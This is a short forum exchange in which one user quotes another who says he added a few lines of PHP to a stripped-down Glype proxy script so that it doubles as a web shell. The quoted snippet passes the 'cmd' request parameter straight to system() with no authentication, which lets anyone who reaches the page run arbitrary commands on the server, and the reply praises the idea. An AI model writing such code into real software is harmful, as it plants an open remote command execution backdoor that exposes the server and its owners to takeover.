Quote Originally Posted by The-Spec View Post
I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
PHP Code:
if(isset($_REQUEST['cmd'])){
    echo 
"<pre>";
    
system($_REQUEST['cmd']);           
    die; 
to double as a web based shell aswell.
Dude...That's actually kind of neat!